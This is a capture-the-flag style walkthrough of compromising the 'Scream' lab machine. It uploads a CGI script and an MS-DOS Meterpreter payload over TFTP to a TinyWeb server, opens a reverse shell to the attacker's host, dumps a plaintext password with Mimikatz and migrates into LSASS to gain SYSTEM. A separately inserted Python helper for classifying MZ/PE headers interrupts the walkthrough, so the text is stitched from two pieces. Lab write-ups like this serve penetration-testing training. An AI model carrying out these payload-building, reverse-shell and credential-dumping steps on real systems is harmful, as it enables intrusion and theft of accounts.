As we can see from the original Nmap scan in Method 1, there is an FTP service which allows anonymous read access to part of the file system. Peeking inside the root folder gives us a good indication that this is where the TinyWeb service is running; however, we have no write access. The Nmap scan also showed that port 69 (TFTP) may be open.
[email protected]:~# nmap -n -sU -sV 192.168.127.130
69/udp open tftp?
1 service unrecognized despite returning data.
The problem with TFTP is that there is no way to know which remote directory the service is bound to, so we have no idea where uploaded files will land. I created a very basic HTML page and uploaded it via TFTP.
Using the web service and the FTP access, I could confirm the file was written to the
[email protected]:~# vi test.html
<html>
<body>
<p>This is a test.</p>
</body>
</html>
[email protected]:~# tftp 192.168.127.130
tftp> put test.html
Sent 58 bytes in 0.0 seconds
[email protected]:~# ftp 192.168.127.130
ftp> ls root
200 Port command successful
150 Opening data channel for directory list.
drwxr-xr-x 1 ftp ftp     0 Feb 08  2013 cgi-bin
---------- 1 ftp ftp 14539 Oct 31  2012 index.html
---------- 1 ftp ftp    63 May 16 13:56 test.html
I went and downloaded TinyWeb from RITLabs and found that within their download package, they had some example files for CGI applications.
I uploaded a few of these to the cgi-bin folder via TFTP and executed them:
[email protected]:~# cp scream/tinyweb/cgi/HELLO.PL /root/hello.pl
[email protected]:~# tftp 192.168.127.130
tftp> put cgi-bin/hello.pl
Sent 330 bytes in 0.0 seconds
[email protected]:~# curl http://192.168.127.130/cgi-bin/hello.pl
Hello, World!
The next test was to see if I could upload a CGI script that would run an executable (i.e. a Meterpreter payload…).
[email protected]:~# cp scream/tinyweb/cgi/helloexe.pl /root/exploit.pl
Change the line that runs the executable to:
print `exploit.exe`;
Now to make the exploit, but there's an added complication. I found that normal PE32 executables created by msfpayload would not execute on the remote host, and if you examine the doscgi.exe file (in the CGI examples in the TinyWeb download) you can see it's an MS-DOS executable. There's no option in msfencode to produce one of these as far as I can tell, so it has to be done manually.
The first stage is to produce a raw payload.
[email protected]:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.127.127 R > exploit_raw
Then convert this into ASM format using the Metasm disassemble.rb sample script that ships with Metasploit.
[email protected]:~# ruby /usr/share/metasploit-framework/lib/metasm/samples/disassemble.rb /root/exploit_raw > /root/exploit_asm
There are two lines we have to manually add to the top of this file.
[email protected]:~# vi exploit_asm
.section '.text' rwx
.entrypoint
Then finally encode this into the final executable.
[email protected]:~# ruby /usr/share/metasploit-framework/lib/metasm/samples/peencode.rb /root/exploit_asm
saved to file "a.out"
[email protected]:~# mv a.out /root/exploit.exe
[email protected]:~# file exploit.exe
exploit.exe: MS-DOS executable, MZ for MS-DOS
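The `file` output above hinges on one header field: a plain MS-DOS MZ image has no PE signature where e_lfanew points, whereas a Win32 PE32 image does. As an added example (not code from the original write-up), here is a small Python triage helper a defender can run over files that turn up unexpectedly in a cgi-bin, reporting whether each is a PE image (and for which machine) or a DOS-only MZ; the sample headers are constructed inline.

```python
import struct

# Constructed sample headers, not files from the original post.
# MZ layout used: e_magic "MZ" at offset 0, e_lfanew (uint32 LE) at 0x3C,
# and for a PE image the "PE\0\0" signature at e_lfanew followed by
# IMAGE_FILE_HEADER, whose first WORD is the Machine type.
MACHINE_NAMES = {0x14C: "i386", 0x8664: "x86-64"}


def build_mz(e_lfanew, tail=b""):
    """Build a minimal 64-byte MZ header and append `tail` (constructed data)."""
    hdr = bytearray(64)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, e_lfanew)
    return bytes(hdr) + tail


def build_pe(machine):
    """Constructed MZ header with a PE signature and Machine field at 0x40."""
    return build_mz(0x40, b"PE\x00\x00" + struct.pack("<H", machine) + bytes(18))


def classify_exe(data):
    """Return 'not-mz', 'dos-mz', or 'pe/<machine>' for an executable image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return "not-mz"
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # DOS-only images leave e_lfanew at 0 or pointing at nothing useful;
    # either way there is no PE signature to find.
    if e_lfanew == 0 or e_lfanew + 6 > len(data):
        return "dos-mz"
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return "dos-mz"
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]
    return "pe/" + MACHINE_NAMES.get(machine, hex(machine))


def triage(files):
    """Classify a {name: bytes} mapping, e.g. files pulled from a cgi-bin."""
    return {name: classify_exe(data) for name, data in files.items()}


if __name__ == "__main__":
    samples = {
        "win32.exe": build_pe(0x14C),          # ordinary PE32, would not run here
        "dosonly.exe": build_mz(0),            # what peencode.rb produced above
        "hello.pl": b"#!/usr/bin/perl\nprint 'Hello, World!';\n",
    }
    for name, verdict in triage(samples).items():
        print(f"{name}: {verdict}")
```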
Upload and Execute
Upload these two files via TFTP, then start the Metasploit multi/handler.
[email protected]:~# tftp 192.168.127.130
tftp> put cgi-bin/exploit.pl
Sent 538 bytes in 0.0 seconds
tftp> put cgi-bin/exploit.exe
Sent 1028 bytes in 0.0 seconds
[email protected]:~# msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=192.168.127.127 E
I then used cURL to execute the CGI script, which in turn executes the exe.
[email protected]:~# curl http://192.168.127.130/cgi-bin/exploit.pl
[*] Sending stage (769536 bytes) to 192.168.127.130
[*] Meterpreter session 1 opened (192.168.127.127:4444 -> 192.168.127.130:1034)
meterpreter > getuid
Server username: SCREAM\alex
Unlike in the previous method, where the SSH service was running as SYSTEM, the TinyWeb service is running as user alex. This means that some privilege escalation is now required.
First I loaded the Mimikatz extension to find alex's password stored in memory. This wasn't really necessary, as there aren't any other services I can authenticate to; I just did it for the sake of completeness.
meterpreter > load mimikatz
meterpreter > wdigest
0;34668 NTLM SCREAM alex thisisaverylongpassword
All that's required to elevate is to migrate the Meterpreter session into a process running as SYSTEM. I attempted to migrate into PID 664, LSASS.
meterpreter > migrate 664
[*] Migrating from 3272 to 664...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM